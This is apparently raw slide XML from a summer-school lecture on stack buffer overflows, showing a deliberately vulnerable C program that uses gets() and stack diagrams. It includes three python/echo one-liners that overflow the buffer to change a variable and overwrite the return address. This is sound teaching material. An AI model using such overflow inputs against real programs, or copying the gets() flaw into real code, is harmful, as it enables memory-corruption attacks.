      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1275150" y="3168904"/>
            <a:ext cx="6593700" cy="310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4207273" y="804633"/>
            <a:ext cx="687463" cy="922132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3799401" y="2735433"/>
            <a:ext cx="1442480" cy="137303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4294967295" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731375" y="1454633"/>
            <a:ext cx="5457000" cy="154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hello!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3790014" y="2546433"/>
            <a:ext cx="1442480" cy="137303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4158781" y="212498"/>
            <a:ext cx="1138044" cy="1046395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4294967295" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214400" y="4491897"/>
            <a:ext cx="65937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/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52" name="Shape 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396450" y="2811879"/>
            <a:ext cx="8229600" cy="138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Lecture Slides @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Walter Turncoat"/>
                <a:ea typeface="Walter Turncoat"/>
                <a:cs typeface="Walter Turncoat"/>
                <a:sym typeface="Walter Turncoat"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>tinyurl.com/system-security-summerschool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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012099" y="1905000"/>
            <a:ext cx="8032500" cy="404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In Today’s Lecture :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Walter Turncoat"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2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Buffer Overflow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Walter Turncoat"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2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Executable Stack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4141749" y="374999"/>
            <a:ext cx="1066022" cy="1073648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417819" y="693760"/>
            <a:ext cx="513980" cy="436080"/>
          </a:xfrm>
          <a:custGeom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3959448" y="236800"/>
            <a:ext cx="1581953" cy="121193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366776" y="624725"/>
            <a:ext cx="709925" cy="559316"/>
          </a:xfrm>
          <a:custGeom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801225" y="1570275"/>
            <a:ext cx="7898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You Know Buffer Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="-25000"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</a:t>
            </a:r>
            <a:r>
              <a:rPr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?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44400" y="2993275"/>
            <a:ext cx="8183400" cy="3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3556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Walter Turncoat"/>
              <a:buChar char="✓"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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How severe it can be ?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3556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Walter Turncoat"/>
              <a:buChar char="✓"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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Doing Mischief with it ?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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-3556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Walter Turncoat"/>
              <a:buChar char="✓"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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&amp; It’s fun !!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4294967295" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8"/>
            <a:ext cx="5457000" cy="154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Let ’</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="-25000" lang="en" sz="4800"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800"/>
              <a:t> Review !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35525" y="1489575"/>
            <a:ext cx="8183400" cy="41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457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Walter Turncoat"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Walter Turncoat"/>
                <a:ea typeface="Walter Turncoat"/>
                <a:cs typeface="Walter Turncoat"/>
                <a:sym typeface="Walter Turncoat"/>
              </a:rPr>
              <a:t>Buffer address increases from low to High.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Walter Turncoat"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Walter Turncoat"/>
                <a:ea typeface="Walter Turncoat"/>
                <a:cs typeface="Walter Turncoat"/>
                <a:sym typeface="Walter Turncoat"/>
              </a:rPr>
              <a:t>Opposite to the direction of Stack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Walter Turncoat"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Walter Turncoat"/>
                <a:ea typeface="Walter Turncoat"/>
                <a:cs typeface="Walter Turncoat"/>
                <a:sym typeface="Walter Turncoat"/>
              </a:rPr>
              <a:t>we saw an example to overwrite the value of a Char using String as Buffer.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Walter Turncoat"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Walter Turncoat"/>
                <a:ea typeface="Walter Turncoat"/>
                <a:cs typeface="Walter Turncoat"/>
                <a:sym typeface="Walter Turncoat"/>
              </a:rPr>
              <a:t>Can we do something More ?? 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Walter Turncoat"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Walter Turncoat"/>
                <a:ea typeface="Walter Turncoat"/>
                <a:cs typeface="Walter Turncoat"/>
                <a:sym typeface="Walter Turncoat"/>
              </a:rPr>
              <a:t>Yes we CAN….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487950" y="1552575"/>
            <a:ext cx="3876900" cy="5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int main(int count,char **argv)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int variable=0;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char buffer[65];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gets(buffer);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if(variable != 0)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	printf(“Variable Was Changed”);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else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	printf(“Unchanged”);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return 0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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79" name="Shape 79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5926425" y="1250950"/>
            <a:ext cx="2333400" cy="4551300"/>
            <a:chOff x="5926425" y="1250950"/>
            <a:chExt cx="2333400" cy="4551300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="Shape 80"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5926425" y="1250950"/>
              <a:ext cx="2333400" cy="455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926450" y="1268675"/>
              <a:ext cx="2324400" cy="585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930925" y="1854275"/>
              <a:ext cx="2324400" cy="585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Return Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="83" name="Shape 83"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="81" idx="0"/>
              <a:endCxn id="82" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7088650" y="1268675"/>
              <a:ext cx="4500" cy="58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84" name="Shape 84"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6112750" y="1414250"/>
              <a:ext cx="18543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c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>ount	            **argv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5930925" y="2439875"/>
              <a:ext cx="2324400" cy="585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Previous SP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Shape 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5926450" y="3025475"/>
              <a:ext cx="2324400" cy="354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buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>variable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5930925" y="3380075"/>
              <a:ext cx="2324400" cy="1703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65 bytes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buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="88" name="Shape 88"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6210350" y="3451225"/>
              <a:ext cx="0" cy="153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89" name="Shape 89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1785650" y="307775"/>
            <a:ext cx="7898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Exa</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000"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[si]</a:t>
            </a:r>
            <a:r>
              <a:rPr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mple .. I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87950" y="5465125"/>
            <a:ext cx="51102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A4C2F4"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>echo -e `python -c “print ‘A’*65 + ‘1’ ” ` |  ./a.out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-1082375" y="17750"/>
            <a:ext cx="51102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7709625" y="487067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93" name="Shape 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="464897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94" name="Shape 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="442727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95" name="Shape 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="383216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96" name="Shape 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="361046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97" name="Shape 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="338876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98" name="Shape 98"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="94" idx="0"/>
            <a:endCxn id="95" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7984725" y="4053775"/>
            <a:ext cx="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9" name="Shape 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523450" y="79850"/>
            <a:ext cx="51102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944200" y="3060825"/>
            <a:ext cx="2262300" cy="27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5961925" y="3069678"/>
            <a:ext cx="6387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49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600625" y="3069678"/>
            <a:ext cx="6387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‘\0’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239325" y="3060825"/>
            <a:ext cx="9672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………..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252050" y="3011625"/>
            <a:ext cx="798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LOW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8259825" y="3011625"/>
            <a:ext cx="798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HIGH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487950" y="1552575"/>
            <a:ext cx="3876900" cy="5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int main(int count,char **argv)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int variable = 10;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char buffer[65];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gets(buffer);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if(variable != 10)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	printf(“My Variable is 10”);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else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	printf(“OOps I dont see 10”);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return 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}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5926425" y="1250950"/>
            <a:ext cx="2333400" cy="4551300"/>
            <a:chOff x="5926425" y="1250950"/>
            <a:chExt cx="2333400" cy="4551300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="112" name="Shape 112"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5926425" y="1250950"/>
              <a:ext cx="2333400" cy="455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5926450" y="1268675"/>
              <a:ext cx="2324400" cy="585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930925" y="1854275"/>
              <a:ext cx="2324400" cy="585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Return Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="115" name="Shape 115"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="113" idx="0"/>
              <a:endCxn id="114" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7088650" y="1268675"/>
              <a:ext cx="4500" cy="58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16" name="Shape 116"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6112750" y="1414250"/>
              <a:ext cx="18543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count	            **argv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x="5930925" y="2439875"/>
              <a:ext cx="2324400" cy="585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Previous SP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5926450" y="3025475"/>
              <a:ext cx="2324400" cy="354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variable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5930925" y="3380075"/>
              <a:ext cx="2324400" cy="1703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65 bytes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buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="120" name="Shape 120"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6210350" y="3451225"/>
              <a:ext cx="0" cy="153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21" name="Shape 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1785650" y="307775"/>
            <a:ext cx="7898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</a:t>
            </a:r>
            <a:r>
              <a:rPr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Exa</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000"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[si]</a:t>
            </a:r>
            <a:r>
              <a:rPr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mple .. II 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87950" y="5961975"/>
            <a:ext cx="75408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A4C2F4"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>echo -e `python -c “print ‘A’*65 + ‘\x00\x00\x00\x0b’ ” ` |  ./a.out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-1082375" y="17750"/>
            <a:ext cx="51102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7709625" y="487067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25" name="Shape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="464897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26" name="Shape 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="442727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27" name="Shape 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="383216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28" name="Shape 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="361046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29" name="Shape 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="338876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130" name="Shape 130"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="126" idx="0"/>
            <a:endCxn id="127" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7984725" y="4053775"/>
            <a:ext cx="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1" name="Shape 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523450" y="79850"/>
            <a:ext cx="51102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944200" y="3060825"/>
            <a:ext cx="2262300" cy="27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961925" y="3069678"/>
            <a:ext cx="6387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34" name="Shape 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600625" y="3069678"/>
            <a:ext cx="6387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35" name="Shape 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239300" y="3069675"/>
            <a:ext cx="9672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252050" y="3011625"/>
            <a:ext cx="798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LOW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8259825" y="3011625"/>
            <a:ext cx="798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HIGH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="138" name="Shape 138"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="134" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5473825" y="2705928"/>
            <a:ext cx="807300" cy="2085000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2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9" name="Shape 139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4347150" y="3942525"/>
            <a:ext cx="5502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-6000" y="413133"/>
            <a:ext cx="9156000" cy="11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Only Variable Updation ….  ??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754148" y="3186687"/>
            <a:ext cx="1978323" cy="684825"/>
            <a:chOff x="3664098" y="3087425"/>
            <a:chExt cx="1978323" cy="684825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146" name="Shape 146"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3664098" y="3087425"/>
              <a:ext cx="1978323" cy="558883"/>
            </a:xfrm>
            <a:custGeom>
              <a:pathLst>
                <a:path extrusionOk="0" h="62358" w="65189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3832675" y="3176150"/>
              <a:ext cx="16146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Return Address</a:t>
              </a:r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6524498" y="3091812"/>
            <a:ext cx="1701556" cy="674375"/>
            <a:chOff x="6196223" y="2512325"/>
            <a:chExt cx="1701556" cy="674375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149" name="Shape 149"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6196223" y="2512325"/>
              <a:ext cx="1575618" cy="558883"/>
            </a:xfrm>
            <a:custGeom>
              <a:pathLst>
                <a:path extrusionOk="0" h="62358" w="65189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6283179" y="2590600"/>
              <a:ext cx="16146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Getting Shell</a:t>
              </a:r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3582835" y="3086587"/>
            <a:ext cx="1978323" cy="684825"/>
            <a:chOff x="3664098" y="3087425"/>
            <a:chExt cx="1978323" cy="684825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="152" name="Shape 152"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3664098" y="3087425"/>
              <a:ext cx="1978323" cy="558883"/>
            </a:xfrm>
            <a:custGeom>
              <a:pathLst>
                <a:path extrusionOk="0" h="62358" w="65189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3832675" y="3176150"/>
              <a:ext cx="16146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Executable STK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2874500" y="3397950"/>
            <a:ext cx="612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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736675" y="3328550"/>
            <a:ext cx="612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487950" y="1552575"/>
            <a:ext cx="3876900" cy="5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int main(int count,char **argv)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int variable = 10;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char buffer[65];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gets(buffer);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if(variable != 10)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	printf(“My Variable is 10”);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else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	printf(“OOps I dont see 10”);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	return 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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="161" name="Shape 161"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5926425" y="1250950"/>
            <a:ext cx="2333400" cy="4551300"/>
            <a:chOff x="5926425" y="1250950"/>
            <a:chExt cx="2333400" cy="4551300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="Shape 162"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5926425" y="1250950"/>
              <a:ext cx="2333400" cy="455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5926450" y="1268675"/>
              <a:ext cx="2324400" cy="585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5930925" y="1854275"/>
              <a:ext cx="2324400" cy="585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Return Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="165" name="Shape 165"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="163" idx="0"/>
              <a:endCxn id="164" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7088650" y="1268675"/>
              <a:ext cx="4500" cy="58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66" name="Shape 166"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6112750" y="1414250"/>
              <a:ext cx="18543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count	            **argv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5930925" y="2439875"/>
              <a:ext cx="2324400" cy="585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Previous SP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5926450" y="3025475"/>
              <a:ext cx="2324400" cy="354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variable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5930925" y="3380075"/>
              <a:ext cx="2324400" cy="1703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65 bytes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buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="170" name="Shape 170"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6210350" y="3451225"/>
              <a:ext cx="0" cy="153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71" name="Shape 171"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1785650" y="307775"/>
            <a:ext cx="7898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 Exa</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000"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[si]</a:t>
            </a:r>
            <a:r>
              <a:rPr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mple .. III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87950" y="5961975"/>
            <a:ext cx="81177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A4C2F4"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>echo -e `python -c “print ‘A’*65 + ‘B’*4 + ‘C’*4  + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x12\x12\x12\x12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4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 ` |  ./a.out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-1082375" y="17750"/>
            <a:ext cx="51102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7709625" y="487067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75" name="Shape 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="464897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76" name="Shape 176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="442727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77" name="Shape 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="383216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78" name="Shape 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="361046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79" name="Shape 179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="3388765"/>
            <a:ext cx="550200" cy="22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180" name="Shape 180"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="176" idx="0"/>
            <a:endCxn id="177" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7984725" y="4053775"/>
            <a:ext cx="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1" name="Shape 181"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523450" y="79850"/>
            <a:ext cx="51102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5961925" y="3060385"/>
            <a:ext cx="6387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183" name="Shape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600625" y="3060385"/>
            <a:ext cx="6387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184" name="Shape 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239325" y="3060825"/>
            <a:ext cx="4704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185" name="Shape 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="3058624"/>
            <a:ext cx="5502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186" name="Shape 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5926400" y="2599253"/>
            <a:ext cx="6387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187" name="Shape 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6565100" y="2599253"/>
            <a:ext cx="6387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188" name="Shape 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7203800" y="2599692"/>
            <a:ext cx="4704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189" name="Shape 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7674100" y="2599692"/>
            <a:ext cx="5502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190" name="Shape 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5997525" y="2006800"/>
            <a:ext cx="2208900" cy="27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0x12121212</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4041250" y="2856700"/>
            <a:ext cx="2679000" cy="1339800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 8769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92" name="Shape 192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539900" y="4932800"/>
            <a:ext cx="1862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Segmentation Fault!!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